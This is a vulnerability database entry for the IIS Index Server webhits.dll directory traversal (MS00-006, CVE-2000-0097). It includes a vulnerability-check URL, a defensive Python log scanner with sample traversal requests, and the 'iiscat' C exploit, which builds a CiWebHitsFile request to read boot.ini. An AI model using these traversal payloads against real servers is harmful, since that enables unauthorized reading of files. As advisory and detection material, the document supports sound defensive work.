Microsoft Windows Index Server Remote Directory Traversal Vulnerability (MS00-006)


Vulnerability ID: 1105692    Vulnerability type: Input validation
Published: 2000-01-26    Updated: 2005-10-12
CVE: CVE-2000-0097
CNNVD-ID: CNNVD-200001-056
Platform: Windows    CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/19731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-056
|Details
Microsoft Index Server is a web-based search engine included in the Windows NT 4.0 Option Pack; on Windows 2000 it is installed as a service. webhits.dll, an ISAPI application shipped with Internet Information Server 4.0, contains a vulnerability that lets an attacker break out of the web server's virtual file system and gain unauthorized access to other files on the same logical drive (user databases, log files, or any other file whose path and file name can be guessed). webhits.dll is associated with the .htw file type, but the problem exists even when no .htw file is present on the system. To check whether a system is affected, request http://your_web_server_address/nosuchfile.htw; if the response contains text similar to "format of the QUERY_STRING is invalid", the system is vulnerable.
|Exploit
source: http://www.securityfocus.com/bid/950/info

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services.

When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

The original patch released for this issue still discloses 'include' file types. 'include' files contain various data which assist in the execution of program files.
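A defender-side check for the pattern described above, added here as an example and not part of the advisory, the BID text, or the exploit that follows: a small Python script that reads W3C extended IIS log lines (constructed sample data; the field order is an assumption, not a fixed IIS default), percent-decodes the CiWebHitsFile parameter of .htw requests and flags values that contain a '..' path segment, and also flags .htw requests that carry no query string at all, which is how the nosuchfile.htw probe described in the details section appears in a log.

```python
"""Flag webhits.dll hit-highlighting (.htw) requests whose CiWebHitsFile value
escapes the web root, the MS00-006 / CVE-2000-0097 traversal pattern.
Added example for this advisory; the log lines below are constructed, and the
W3C field order is an assumption, not a fixed IIS default."""
import re
from urllib.parse import parse_qs, unquote

# Constructed sample log in W3C extended format (assumed field order).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-01-27 10:01:02 10.0.0.5 GET /default.htm - 200
2000-01-27 10:01:09 10.0.0.5 GET /samples/search/qsumrhit.htw CiWebHitsFile=/samples/search/default.htm&CiRestriction=none&CiHiliteType=Full 200
2000-01-27 10:02:15 192.0.2.7 GET /default.htw CiWebHitsFile=/../../../../boot.ini&CiRestriction=none&CiHiliteType=Full 200
2000-01-27 10:02:31 192.0.2.7 GET /nosuchfile.htw - 200
2000-01-27 10:03:44 192.0.2.7 GET /default.htw CiWebHitsFile=%2f%2e%2e%2f%2e%2e%2fboot%2eini&CiRestriction=none 200
"""

# A '..' that forms a whole path segment, with either separator.
TRAVERSAL_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding so %2e%2e%2f (or a
    double-encoded %252e...) is compared as the literal '..' it becomes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(path):
    """True when the (decoded) path contains a '..' segment."""
    return bool(TRAVERSAL_SEGMENT.search(decode_fully(path)))


def parse_line(line):
    """Split one log line into the fields we need; None for directives or short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    return {"ip": parts[2], "method": parts[3], "stem": parts[4],
            "query": parts[5], "status": parts[6]}


def analyze(log_text):
    """Return (client_ip, uri_stem, decoded_target, reason) for suspicious .htw requests."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not decode_fully(rec["stem"]).lower().endswith(".htw"):
            continue
        if rec["query"] == "-":
            # Hit highlighting always carries CiWebHitsFile; a bare .htw request
            # matches the nosuchfile.htw probe the advisory describes.
            findings.append((rec["ip"], rec["stem"], "", "htw request without query string"))
            continue
        params = parse_qs(rec["query"], keep_blank_values=True)
        for target in params.get("CiWebHitsFile", []):
            if has_traversal(target):
                findings.append((rec["ip"], rec["stem"], decode_fully(target),
                                 "traversal in CiWebHitsFile"))
    return findings


if __name__ == "__main__":
    for ip, stem, target, reason in analyze(SAMPLE_LOG):
        print(f"{ip} {stem} {target!r}: {reason}")
```

The decoding step matters more than the regex: the parameter arrives percent-encoded, and a single pass of decoding misses double-encoded separators, so the script decodes repeatedly until the value stops changing before looking for a '..' segment. Whitelisting the .htw stems that legitimately exist on the server (the Index Server samples) is a reasonable refinement once the assumed field order is confirmed against the actual log header.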

/* 
   [email protected] 
   
   example: iiscat ../../../../boot.ini

   Builds the hit-highlighting request line for the webhits.dll template
   traversal and prints it to stdout; nothing is sent over the network.
 */

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>

int main(int argc, char **argv)
{
  char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
  int file_buf_size = 250;   /* length to which the path is padded before ".htw" */
  
  /* argv[1] is the file to read, argv[2] (optional) an existing file on the
     server; the existing file must fit in the padded buffer */
  if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) || 
	(argc == 3 && argv[1] && argv[2] && strlen(argv[2]) <= file_buf_size && strlen(argv[1]) < 1024)))
    {
      fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
      exit(1);
    }
  
  file_read = argv[1];
  if (argc == 3)
    file_valid = argv[2];

  sprintf(request, "GET %s", file_valid);
  request_p = request + strlen(request);

  /* pad the valid file name with encoded spaces up to file_buf_size characters */
  file_buf_size -= strlen(file_valid);
  while(file_buf_size)
    {
      strcpy(request_p, "%20");
      request_p += 3;
      file_buf_size--;
    }

  /* the CiWebHitsFile parameter names the template file the DLL will open */
  sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
  puts(request);

  exit(0);
}
|References

Source: MS
Name: MS00-006
Link: http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
Source: BID
Name: 950
Link: http://www.securityfocus.com/bid/950
Source: OSVDB
Name: 1210
Link: http://www.osvdb.org/1210
Source: NSFOCUS
Name: 270
Link: http://www.nsfocus.net/vulndb/270
